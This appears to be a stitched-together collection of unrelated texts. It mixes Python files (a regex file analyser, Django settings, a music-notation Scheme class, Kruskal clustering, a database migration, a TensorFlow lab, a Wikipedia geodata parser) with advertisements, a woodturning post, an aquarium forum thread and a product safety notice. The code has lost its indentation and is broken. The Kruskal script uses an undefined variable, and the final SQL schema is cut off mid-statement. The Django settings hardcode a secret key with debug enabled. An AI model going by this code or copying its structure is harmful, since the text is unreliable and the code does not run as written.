def count_different_matches(pattern, content):
match = pattern.findall(content)
if match:
s = set()
for x in match:
s.add(x)
return len(s)
else:
return 0
def count_different_dates(content):
matches = dates_pattern.finditer(content)
if matches:
s = set()
for match in matches:
day = ""
month = ""
year = ""
groups = match.groupdict()
for g in groups:
v = groups[g]
if g[0:3] == "day" and v is not None:
day = v
elif g[0:5] == "month" and v is not None:
month = v
elif g[0:4] == "year" and v is not None:
year = v
s.add(year + "-" + month + "-" + day)
return len(s)
else:
return 0
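# Normalization example (sketch): both '2014-05-01' and '01.05.2014' match
# dates_pattern; the named groups are reassembled as 'year-month-day', so
# the two spellings count as one distinct date.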
def count_ints(content):
ints = map(lambda m: m[0] if isinstance(m, tuple) else m,
num_pattern.findall(content))
return len(set(ints))
def process_file(file_path):
fp = codecs.open(file_path, 'rU', 'iso-8859-2')
content = fp.read()
#
# INSERT YOUR CODE HERE
#
fp.close()
print("nazwa pliku: " + file_path)
print("autor: " + my_match(author_pattern, content))
print("dzial: " + my_match(dept_pattern, content))
print("slowa kluczowe: " + multi_match(key_pattern, content))
text = my_match(text_pattern, content)
print("liczba zdan: " + str(count_matches(phrase_pattern, text)))
print("liczba skrotow: " + str(count_different_matches(abbrev_pattern, text)))
print("liczba liczb calkowitych z zakresu int: " + str(count_ints(text)))
print("liczba liczb zmiennoprzecinkowych: " + str(count_different_matches(float_pattern, text)))
print("liczba dat: " + str(count_different_dates(text)))
print("liczba adresow email: " + str(count_different_matches(emails_pattern, text)))
print("\n")
try:
path = sys.argv[1]
except IndexError:
print("Brak podanej nazwy katalogu")
sys.exit(0)
tree = os.walk(path)
for root, dirs, files in tree:
for f in files:
if f.endswith(".html"):
filepath = os.path.join(root, f)
process_file(filepath) |
All products from Hampshire Office Furniture are delivered and installed by our team of professional installers. Their job is to ensure you are 100% satisfied with your new office furniture.
Based in Havant, Hampshire and with over 40 years’ experience in the industry, we can offer an extensive range of high quality office furniture to suit all tastes, budgets and personalities.
Whether you’re looking for a traditional office set-up or creating a modern agile working environment, we will have a solution for you.
To provide a 5-star service to all our customers.
We have an excellent range of chairs for the workplace to suit any style and budget including Meeting Room Chairs, Executive Chairs, Soft Seating, Task Chairs and much, much, MUCH more!
We offer a full range of office desk solutions to suit any working environment. All of our desking ranges come in an extensive range of finishes, along with integral cable management to help keep your workplace organised. Coupled with essential office storage items such as desk pedestals, our office desks will make your office look and feel great to work in.
The design of your reception area will speak volumes about your business. This is where your visitors form their first perception of you and start making decisions about your company. For this reason, we have created an extensive range of reception area furniture to ensure all your customers are impressed from the minute they walk through your door.
We're always happy to help so if you have any questions, please don't hesitate to get in contact with the team here at Hampshire Office Furniture either by phone or email.
Motivated, well-performing staff are your company’s greatest asset.
Basic space planning principles and methods for commercial offices. |
# -*- encoding: utf-8 -*-
from abjad.tools import stringtools
from abjad.tools.abctools import AbjadValueObject
class Scheme(AbjadValueObject):
r'''Abjad model of Scheme code.
.. container:: example
**Example 1.** A Scheme boolean value:
::
>>> scheme = schemetools.Scheme(True)
>>> print(format(scheme))
##t
.. container:: example
**Example 2.** A nested Scheme expression:
::
>>> scheme = schemetools.Scheme(
... ('left', (1, 2, False)),
... ('right', (1, 2, 3.3))
... )
>>> print(format(scheme))
#((left (1 2 #f)) (right (1 2 3.3)))
.. container:: example
**Example 3.** A variable-length argument:
::
>>> scheme_1 = schemetools.Scheme(1, 2, 3)
>>> scheme_2 = schemetools.Scheme((1, 2, 3))
>>> format(scheme_1) == format(scheme_2)
True
Scheme wraps nested variable-length arguments in a tuple.
.. container:: example
**Example 4.** A quoted Scheme expression:
::
>>> scheme = schemetools.Scheme((1, 2, 3), quoting="'#")
>>> print(format(scheme))
#'#(1 2 3)
Use the `quoting` keyword to prepend Scheme's various quote, unquote,
unquote-splicing characters to formatted output.
.. container:: example
**Example 5.** A Scheme expression with forced quotes:
::
>>> scheme = schemetools.Scheme('nospaces', force_quotes=True)
>>> print(format(scheme))
#"nospaces"
Use this in certain \override situations when LilyPond's Scheme
interpreter treats unquoted strings as symbols instead of strings.
The string must contain no whitespace for this to work.
.. container:: example
**Example 6.** A Scheme expression of LilyPond functions:
::
>>> function_1 = 'tuplet-number::append-note-wrapper'
>>> function_2 = 'tuplet-number::calc-denominator-text'
>>> string = schemetools.Scheme('4', force_quotes=True)
>>> scheme = schemetools.Scheme(
... function_1,
... function_2,
... string,
... )
>>> scheme
Scheme('tuplet-number::append-note-wrapper', 'tuplet-number::calc-denominator-text', Scheme('4', force_quotes=True))
>>> print(format(scheme))
#(tuplet-number::append-note-wrapper tuplet-number::calc-denominator-text "4")
.. container:: example
**Example 7.** A Scheme lambda expression of LilyPond function that
takes a markup with a quoted string argument. Setting verbatim to true
causes the expression to format exactly as-is without modifying quotes
or whitespace:
::
>>> string = '(lambda (grob) (grob-interpret-markup grob'
>>> string += r' #{ \markup \musicglyph #"noteheads.s0harmonic" #}))'
>>> scheme = schemetools.Scheme(string, verbatim=True)
>>> scheme
Scheme('(lambda (grob) (grob-interpret-markup grob #{ \\markup \\musicglyph #"noteheads.s0harmonic" #}))')
>>> print(format(scheme))
#(lambda (grob) (grob-interpret-markup grob #{ \markup \musicglyph #"noteheads.s0harmonic" #}))
Scheme objects are immutable.
'''
### CLASS VARIABLES ###
__slots__ = (
'_force_quotes',
'_quoting',
'_value',
'_verbatim',
)
### INITIALIZER ###
def __init__(self, *args, **kwargs):
if 1 == len(args):
if isinstance(args[0], type(self)):
args = args[0]._value
else:
args = args[0]
quoting = kwargs.get('quoting')
force_quotes = bool(kwargs.get('force_quotes'))
verbatim = kwargs.get('verbatim')
assert isinstance(quoting, (str, type(None)))
if quoting is not None:
assert all(x in ("'", ',', '@', '`', '#') for x in quoting)
self._force_quotes = force_quotes
self._quoting = quoting
self._value = args
self._verbatim = bool(verbatim)
### SPECIAL METHODS ###
def __format__(self, format_specification=''):
r'''Formats scheme.
Set `format_specification` to `''`, `'lilypond'` or `'storage'`.
Interprets `''` as `'lilypond'`.
.. container:: example
**Example 1.** Scheme LilyPond format:
::
>>> scheme = schemetools.Scheme('foo')
>>> format(scheme)
'#foo'
.. container:: example
**Example 2.** Scheme storage format:
::
>>> print(format(scheme, 'storage'))
schemetools.Scheme(
'foo'
)
Returns string.
'''
from abjad.tools import systemtools
if format_specification in ('', 'lilypond'):
return self._lilypond_format
elif format_specification == 'storage':
return systemtools.StorageFormatManager.get_storage_format(self)
return str(self)
def __getnewargs__(self):
r'''Gets new arguments.
Returns tuple.
'''
return (self._value,)
def __str__(self):
r'''String representation of scheme object.
Returns string.
'''
if self._quoting is not None:
return self._quoting + self._formatted_value
return self._formatted_value
### PRIVATE PROPERTIES ###
@property
def _formatted_value(self):
from abjad.tools import schemetools
return schemetools.Scheme.format_scheme_value(
self._value,
force_quotes=self.force_quotes,
verbatim=self.verbatim,
)
@property
def _lilypond_format(self):
if self._quoting is not None:
return '#' + self._quoting + self._formatted_value
return '#%s' % self._formatted_value
@property
def _storage_format_specification(self):
from abjad.tools import systemtools
if stringtools.is_string(self._value):
positional_argument_values = (self._value,)
else:
positional_argument_values = self._value
keyword_argument_names = []
if self.force_quotes:
keyword_argument_names.append('force_quotes')
if self.quoting:
keyword_argument_names.append('quoting')
return systemtools.StorageFormatSpecification(
self,
keyword_argument_names=keyword_argument_names,
positional_argument_values=positional_argument_values,
)
### PUBLIC METHODS ###
@staticmethod
def format_embedded_scheme_value(value, force_quotes=False):
r'''Formats `value` as an embedded Scheme value.
'''
from abjad.tools import datastructuretools
from abjad.tools import schemetools
result = Scheme.format_scheme_value(value, force_quotes=force_quotes)
if isinstance(value, bool):
result = '#{}'.format(result)
elif isinstance(value, datastructuretools.OrdinalConstant):
result = '#{}'.format(repr(value).lower())
elif isinstance(value, str) and not force_quotes:
result = '#{}'.format(result)
elif isinstance(value, schemetools.Scheme):
result = '#{}'.format(result)
return result
@staticmethod
def format_scheme_value(value, force_quotes=False, verbatim=False):
r'''Formats `value` as Scheme would.
.. container:: example
**Example 1.** Some basic values:
::
>>> schemetools.Scheme.format_scheme_value(1)
'1'
::
>>> schemetools.Scheme.format_scheme_value('foo')
'foo'
::
>>> schemetools.Scheme.format_scheme_value('bar baz')
'"bar baz"'
::
>>> schemetools.Scheme.format_scheme_value([1.5, True, False])
'(1.5 #t #f)'
.. container:: example
**Example 2.** Strings without whitespace can be forcibly quoted
via the `force_quotes` keyword:
::
>>> schemetools.Scheme.format_scheme_value(
... 'foo',
... force_quotes=True,
... )
'"foo"'
.. container:: example
**Example 3.** Set verbatim to true to format value exactly (with
only a hash prepended):
::
>>> string = '(lambda (grob) (grob-interpret-markup grob'
>>> string += r' #{ \markup \musicglyph #"noteheads.s0harmonic" #}))'
>>> schemetools.Scheme.format_scheme_value(string, verbatim=True)
'(lambda (grob) (grob-interpret-markup grob #{ \\markup \\musicglyph #"noteheads.s0harmonic" #}))'
Returns string.
'''
from abjad.tools import schemetools
if isinstance(value, str) and not verbatim:
value = value.replace('"', r'\"')
if -1 == value.find(' ') and not force_quotes:
return value
return '"{}"'.format(value)
elif isinstance(value, str) and verbatim:
return value
elif isinstance(value, bool):
if value:
return '#t'
return '#f'
elif isinstance(value, (list, tuple)):
return '({})'.format(
' '.join(schemetools.Scheme.format_scheme_value(x)
for x in value))
elif isinstance(value, schemetools.Scheme):
return str(value)
elif isinstance(value, type(None)):
return '#f'
return str(value)
### PUBLIC PROPERTIES ###
@property
def force_quotes(self):
r'''Is true when quotes should be forced in output. Otherwise false.
Returns boolean.
'''
return self._force_quotes
@property
def quoting(self):
r'''Gets Scheme quoting string.
Returns string.
'''
return self._quoting
@property
def verbatim(self):
r'''Is true when formatting should format value absolutely verbatim.
Whitespace, quotes and all other parts of value are left intact.
Defaults to false.
Set to true or false.
Returns true or false.
'''
return self._verbatim |
It’s been a while since I’ve posted any projects, so I thought I’d post a couple that I’m kind of proud of. The first is a bias bowl turned from plywood. The blank was about 4.5” square and was glued up from scrap baltic birch. It was turned mostly with EWTs, as the plywood dulled my Thompson bowl gouge very quickly. It is finished with gloss Deft spray lacquer. This one won me a blue ribbon at the Oklahoma State Fair last September. The second is a bowl that won second place. It’s turned from a piece of spalted hackberry. This one is finished with Mylands friction polish.
I remember seeing these bowls just this past year. I really liked the plywood bowls. I told my wife, "That looks like a turning tool duller." But they came out gorgeous. Great work!
With those gorgeous grains and awesome shapes, they are sure winners. Great job! |
"""
Computer Science Department (SCC)
Mathematics and Computer Science Institute (ICMC)
University of Sao Paulo (USP)
Algorithms Projects
Teacher: Gustavo Batista
Author: Arthur Fortes da Costa
Method Kruskal
"""
from vertexFunctions import *
from readFile import readFile
from unionFind import unionFind
from operator import itemgetter
def kruskal(nodes, edges, cluster):
forest = unionFind()
mst = []
for n in nodes:
forest.add(n)
sz = len(nodes) - 1
for e in sorted(edges, key=itemgetter(2)):
n1, n2, _ = e
t1 = forest.find(n1)
t2 = forest.find(n2)
if t1 != t2:
mst.append(e)
sz -= 1
if sz == (cluster-1):
return mst
forest.union(t1, t2)
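# Clustering note (sketch): a spanning tree over n nodes needs n-1 edges; by
# returning once sz reaches cluster-1 (i.e. after n-cluster accepted edges),
# the union-find forest is left with exactly `cluster` connected components.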
edges = []
nodes = []
edges, nodes, vertex = readFile("base.txt")
result = kruskal(nodes, edges, 7)
buildVertex(vertex)
addNeighbor(result)
ColorVertex()
resp = open("kruskalCut.txt", 'w')
for u in range(len(k)):
resp.write(str(k[u].no)+str("\n"))
resp.write(str("Coordenada: ")+str("(")+str(k[u].dx)+str(", ")+ str(k[u].dy)+str(")")+str("\n"))
resp.write(str("Vizinhos: ")+str(k[u].neighbor)+str("\n"))
resp.write(str("Cor: ")+str(k[u].color)+str("\n"))
resp.write(str("\n"))
resp.close()
dig = open("kruskal.txt", 'w')
for u in range(len(k)):
dig.write(str(k[u].dx)+str("\t")+str(k[u].dy)+str("\t")+str(k[u].color)+str("\n"))
dig.close()
|
In Western Pennsylvania, Yinzer and Jagoff are terms of endearment.
Saying “dahntahn” is as much a beloved tradition as putting fries on your sammich or waving a yellow towel! That’s why Pittsburgh radio personalities Jim Krenn and Larry Richert have teamed up with cartoonist Rob Rogers to create Yinzer Cards as a way of celebrating the city they love. Join them in sending humorous Pittsburgh greetings to all of your friends and family!
In Western Pennsylvania, Yinzer Cards are available exclusively at Giant Eagle and Market District stores. |
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.8.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'p+7p7lv_36$-f+@bw=verpk$o&e(#6@79et^7=819!_1i8vxnp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'polls',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
|
We offer excellent products and competitive selling prices. We warmly welcome clients from home and overseas to cooperate with us for Galvanized Tree Grating, Galvanized Steel Grating and Electro Galvanized Steel Grating, and we welcome clients from all around the world for almost any sort of cooperation to build mutual advantage. We have been devoting ourselves wholeheartedly to supplying customers the very best service.
"Along with the ""Client-Oriented"" small business philosophy, a rigorous high-quality handle system, highly developed producing machines and a powerful R&D group, we always supply high-quality products and solutions, fantastic services and aggressive costs for Galvanized Tree Grating , Galvanized Steel Grating , Electro Galvanized Steel Grating , We hope to have long-term cooperation relationships with our clients. If you are interested in any of our products and solutions please do not hesitate to send enquiry to us/company name. We ensure that you can be totally satisfied with our best solutions! |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Group.slug'
db.add_column(u'playlists_group', 'slug',
self.gf('django.db.models.fields.SlugField')(default='slug-default', max_length=200),
keep_default=False)
# Adding field 'Playlist.slug'
db.add_column(u'playlists_playlist', 'slug',
self.gf('django.db.models.fields.SlugField')(default='slug-default', max_length=200),
keep_default=False)
# Adding field 'Category.slug'
db.add_column(u'playlists_category', 'slug',
self.gf('django.db.models.fields.SlugField')(default='slug-default', max_length=200),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Group.slug'
db.delete_column(u'playlists_group', 'slug')
# Deleting field 'Playlist.slug'
db.delete_column(u'playlists_playlist', 'slug')
# Deleting field 'Category.slug'
db.delete_column(u'playlists_category', 'slug')
models = {
u'playlists.category': {
'Meta': {'ordering': "['name']", 'object_name': 'Category'},
'categoryid': ('django.db.models.fields.CharField', [], {'max_length': '200', 'primary_key': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['playlists.Group']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'The name of the category'", 'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'})
},
u'playlists.group': {
'Meta': {'ordering': "['name']", 'object_name': 'Group'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'groupid': ('django.db.models.fields.CharField', [], {'max_length': '200', 'primary_key': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'default': "'Some, key, words'", 'max_length': '200'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'The name of the group'", 'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'}),
'stations': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['playlists.Playlist']", 'symmetrical': 'False'})
},
u'playlists.playlist': {
'Meta': {'ordering': "['name']", 'object_name': 'Playlist'},
'cover_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'creator': ('django.db.models.fields.CharField', [], {'default': "'The creator of the playlist'", 'max_length': '200'}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'default': "'A description of the playlist'", 'max_length': '200'}),
'featured_artists': ('django.db.models.fields.CharField', [], {'default': "'A, list, of, the artists, formatted, like, this'", 'max_length': '200'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'The name of the playlist'", 'max_length': '200'}),
'playlistid': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'}),
'song_count': ('django.db.models.fields.IntegerField', [], {}),
'songs': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['songs.Song']", 'symmetrical': 'False'}),
'songza_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'spotify_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'songs.song': {
'Meta': {'ordering': "['title']", 'object_name': 'Song'},
'album': ('django.db.models.fields.CharField', [], {'default': "'Album name'", 'max_length': '200'}),
'artist': ('django.db.models.fields.CharField', [], {'default': "'Artist name'", 'max_length': '200'}),
'cover_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'duration': ('django.db.models.fields.IntegerField', [], {}),
'genre': ('django.db.models.fields.CharField', [], {'default': "'Song genre'", 'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'}),
'songid': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Song title'", 'max_length': '200'})
}
}
complete_apps = ['playlists'] |
This document contains safety, operating, disposal, and regulatory information for Focals and accessories. Read all safety information and operating instructions before using Focals to avoid injury or damage.
While wearing Focals, press the power button 5 times to get regulatory information for Focals and Loop on your display. |
# Copyright (c) 2014 Marist SDN Innovation lab Joint with Plexxi Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class MockProperty(object):
def __init__(self, val, name):
self.val = val
self.name = name
class MockDNSInfo(object):
def __init__(self, string):
self.string = string
class MockvCenterHost(dict):
def __init__(self, obj):
self.obj = obj
class MockNicContainer(object):
def __init__(self, nicList):
self.PhysicalNic = nicList
self.HostVirtualNic = nicList
|
Four remarkable musicians, former and current players from La Scala in Milan, will be coming especially to the Vez Dungeon.
The baritone Romain Dayez offers a remarkable artistic performance mixing ancient sacred music with electro. A contemporary creation combining music and dance.
Thibaut Garcia, a young musical prodigy with an international career, won the Victoire de la Musique Classique 2019 in February.
Matthew Tutsky, principal harpist with several American orchestras, will be coming specially to France for this concert at the Dungeon.
# Lab 5 Logistic Regression Classifier
import tensorflow as tf
import numpy as np
tf.set_random_seed(777) # for reproducibility
xy = np.loadtxt('data-03-diabetes.csv', delimiter=',', dtype=np.float32)
x_data = xy[:, 0:-1]
y_data = xy[:, [-1]]
print(x_data.shape, y_data.shape)
# placeholders for a tensor that will be always fed.
X = tf.placeholder(tf.float32, shape=[None, 8])
Y = tf.placeholder(tf.float32, shape=[None, 1])
W = tf.Variable(tf.random_normal([8, 1]), name='weight')
b = tf.Variable(tf.random_normal([1]), name='bias')
# Hypothesis using sigmoid: tf.div(1., 1. + tf.exp(-(tf.matmul(X, W) + b)))
hypothesis = tf.sigmoid(tf.matmul(X, W) + b)
# cost/loss function
cost = -tf.reduce_mean(Y * tf.log(hypothesis) + (1 - Y) *
tf.log(1 - hypothesis))
train = tf.train.GradientDescentOptimizer(learning_rate=0.01).minimize(cost)
# Accuracy computation
# True if hypothesis>0.5 else False
predicted = tf.cast(hypothesis > 0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))
# Launch graph
with tf.Session() as sess:
# Initialize TensorFlow variables
sess.run(tf.global_variables_initializer())
for step in range(10001):
cost_val, _ = sess.run([cost, train], feed_dict={X: x_data, Y: y_data})
if step % 200 == 0:
print(step, cost_val)
# Accuracy report
h, c, a = sess.run([hypothesis, predicted, accuracy],
feed_dict={X: x_data, Y: y_data})
print("\nHypothesis: ", h, "\nCorrect (Y): ", c, "\nAccuracy: ", a)
'''
0 0.82794
200 0.755181
400 0.726355
600 0.705179
800 0.686631
...
9600 0.492056
9800 0.491396
10000 0.490767
...
[ 1.]
[ 1.]
[ 1.]]
Accuracy: 0.762846
'''
|
1. My runt tends to get black every so often... but will lighten up. I saw white poop once, but after I did my 60% WC and raised the temp to 90-92 for 3 days it went away. It's been about 4 days now... I know I should have asked here first, but I haven't had the time to get on :/ Was what I did okay?
3. I see these small worms every now and then; they are really small and swim sideways in an S movement... Are these bad? If they are, what do I need to do to get rid of them?
4. For my water changes I am using a 30 gallon trashcan and two 5 gallon containers. I heat the trashcan to 85F as well and run a pump on it for 1 hour or so before my water changes... I try to leave it out for 24 hours before my water changes. I just wanted to know if this is considered aging my water... and how long does water need to be out for it to be aged?
I guarantee more questions to come. SORRY and THANK YOU for any responses!
Raising the temp is OK for certain things, but if you see white poop one time and raise your temp just for that, it sounds a little excessive to me. You can raise your temp, but with some bacterial infections it can cause more harm than good. It's better to know why you're raising the temperature than to just start cranking it up. As far as the fish turning black, that means something is definitely wrong and causing stress to the fish. I would need more info to properly give you some advice.
Josie... where did you get the discus from, and how old are they?
Okay, thank you :) And yeah, I was thinking about why I raised the temp; I just want to keep them healthy and was a little quick to pull the trigger. I got them from Tony, and they are 3 months old for the smallest, I believe he said... may have been 2... honestly I can't remember :/ But thank you for responding :) Much appreciated.
import os, subprocess
import numpy as np
import h5py
import json
from image import image
class Operation:
def __init__(self):
pass
# generate image for each sequence
def generate_image(self, source, target, num_channel, origin_size=32,
out_size=32, bound=15.0, bin_image='image/bin/image'):
if not os.path.exists(target): os.makedirs(target)
# run flow command
p = subprocess.Popen([bin_image,
'--source', source, '--target', target,
'--channel', str(num_channel),
'--origin', str(origin_size),
'--out', str(out_size),
'--bound', str(bound)])
p.wait()
# generate label file
self._generate_label(source, target)
# load labels
def _generate_label(self, source, target, label_file='label.json'):
with h5py.File(source, 'r') as hf:
labels = [int(l) for l in hf['label'][()]]
# save labels as a dict in json file
labels_dict = {i: l
for i, l in zip(range(len(labels) - 1), labels[1:])}
with open(os.path.join(target, label_file), 'w') as jf:
json.dump(labels_dict, jf)
# delete generated image files
def clean_image(self, file_dir, label_file='label.json'):
print 'Cleaning', file_dir
# delete images in dir
image_files = [os.path.join(file_dir, f)
for f in os.listdir(file_dir)
if os.path.isfile(os.path.join(file_dir, f)) and 'jpg' in f]
for image_file in image_files:
try:
os.remove(image_file)
except Exception, e:
print e
# delete label file
try:
os.remove(os.path.join(file_dir, label_file))
except Exception, e:
print e
# delete dir
try:
os.rmdir(file_dir)
except Exception, e:
print e
# get frame count
def _get_frame_num(self, source, label_file='label.json'):
with open(os.path.join(source, label_file), 'r') as jf:
labels_dict = json.load(jf)
return len(labels_dict)
# setup mean counter and accumulator at the beginning
def setup_mean(self, num_channel, out_size):
self.image_sums = {}
self.count = 0.0
for c in range(num_channel):
self.image_sums['ch%i_image' % (c,)] = \
np.zeros((1, out_size, out_size), dtype='float32')
# accumulate mean for each sequence
def accum_mean(self, source, num_channel, out_size):
print 'Loading mean', source
frame_num = self._get_frame_num(source)
self.count += frame_num
for c in range(num_channel):
for i in range(frame_num):
image_name = os.path.join(source,
'ch%i_%i_image.jpg' % (c, i))
self.image_sums['ch%i_image' % (c,)] += \
image(image_name).load(out_size, out_size)
# save accumulated mean to file
def save_mean(self, mean_file, num_channel):
# store file as hdf5
if mean_file.endswith('h5'):
print 'Save as hdf5'
with h5py.File(mean_file, 'w') as f:
for c in range(num_channel):
f.create_dataset('ch%i_image' % (c,),
data=self.image_sums['ch%i_image' % (c,)]
/ self.count)
# store file as matlab data
elif mean_file.endswith('mat'):
import scipy.io as sio
print 'Save as mat'
data = {}
for c in range(num_channel):
data['ch%i_image' % (c,)] = \
self.image_sums['ch%i_image' % (c,)] / self.count
sio.savemat(mean_file, data)
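# Example pipeline (sketch; 'flows.h5' and 'out/' are hypothetical paths):
#   op = Operation()
#   op.generate_image('flows.h5', 'out/', 2)
#   op.setup_mean(2, 32)
#   op.accum_mean('out/', 2, 32)
#   op.save_mean('mean.h5', 2)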
|
Welcome to Oran V. Siler Printing. Since 1919 we have provided top quality printing services to the Metro Denver area.
Siler Printing has evolved from a single color/duplication operation to a multi-color/four color process printer, assisted by a complete art and camera department with the latest in desktop publishing technology. |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import re
import xml.etree.cElementTree as xml
import codecs
from string import replace
def parseGeoLocation(geo_cz,geo_dms,geo,coord):
try:
toNumber = lambda s:float(replace(s,u",",u"."))
if geo_cz:
x = geo_cz.split('|')
return (toNumber(x[0]) + toNumber(x[1])/60.0 + toNumber(x[2])/3600.0,toNumber(x[3]) + toNumber(x[4])/60.0 + toNumber(x[5])/3600.0)
elif geo_dms:
x = geo_dms.split('|')
ret = (toNumber(x[0]) + toNumber(x[1])/60.0 + toNumber(x[2])/3600.0,toNumber(x[5]) + toNumber(x[6])/60.0 + toNumber(x[7])/3600.0)
if x[3]=='S':
ret = (-ret[0],ret[1])
if x[8]=='W':
ret = (ret[0],-ret[1])
return ret
elif geo:
x = geo.split('|')
x = x[0].split('_')
if x[3] in ['S','N'] and x[7] in ['W','E']:
ret = (toNumber(x[0]) + toNumber(x[1])/60.0 + toNumber(x[2])/3600.0,toNumber(x[4]) + toNumber(x[5])/60.0 + toNumber(x[6])/3600.0)
if x[3]=='S':
ret = (-ret[0],ret[1])
if x[7]=='W':
ret = (ret[0],-ret[1])
return ret
elif x[2] in ['S','N'] and x[5] in ['W','E']:
ret = (toNumber(x[0]) + toNumber(x[1])/60.0,toNumber(x[3]) + toNumber(x[4])/60.0)
if x[2]=='S':
ret = (-ret[0],ret[1])
if x[5]=='W':
ret = (ret[0],-ret[1])
return ret
elif coord:
pass;
return None;
except:
return None;
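# Conversion example (sketch): a "geo cz" value of '50|5|14|14|24|40' parses
# to (50 + 5/60.0 + 14/3600.0, 14 + 24/60.0 + 40/3600.0)
# = (50.08722..., 14.41111...), i.e. decimal degrees (lat, lon).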
sys.stdout=codecs.getwriter('utf-8')(sys.stdout)
source = sys.stdin
context = iter(xml.iterparse(source, events=("start", "end")))
_,root = context.next()
geo_cz_pattern = re.compile(ur"{{(?:g|G)eo cz\|([^}{]+)}}");
geo_dms_pattern = re.compile(ur"{{(?:g|G)eo dms\|([^}{]+)}}");
geo_pattern = re.compile(ur"{{(?:g|G)eo\|([^}{]+)}}");
coord_pattern = re.compile(ur"{{(?:c|C|k|K)oord(?:ynaty)?\|([^}{]+)}}");
category_pattern = re.compile(ur"\[\[(?:k|K)ategorie:([^\]\|]+)(?:\|[^\]]*)?\]\]");
infobox_pattern = re.compile(ur"{{(?:i|I)nfobox[\s-]*([^\|]+)\|[^}]*}}");
#ele_pattern = re.compile(ur"\|/s*vrchol/s*=/s*([0..9]+)");
ele_pattern = re.compile(ur"\| (?:vrchol|kóta) = ([0-9\s]+)");
population_pattern = re.compile(ur"\| (?:obyvatelé) = ([0-9\s\.]+)");
status_pattern = re.compile(ur"\| (?:status) = ([^\s]+)");
name_pattern = re.compile(ur"(?:\|)? (?:název) = (.+)");
print """
DROP TABLE IF EXISTS "wiki";
SELECT DropGeometryColumn('public','wiki', 'way');
CREATE TABLE "wiki" (
"id" BIGINT PRIMARY KEY,
"title" VARCHAR(511),
"name" VARCHAR(511),
"infobox" VARCHAR(127),
"status" VARCHAR(127),
"ele" INT,
"population" INT,
"cats" VARCHAR(1023),
"text_length" INT,
"historic" VARCHAR(127),
"castle_type" VARCHAR(127),
"ruins" INT,
"amenity" VARCHAR(127),
"religion" VARCHAR(63),
"place_of_worship" VARCHAR(63),
"tourism" VARCHAR(63),
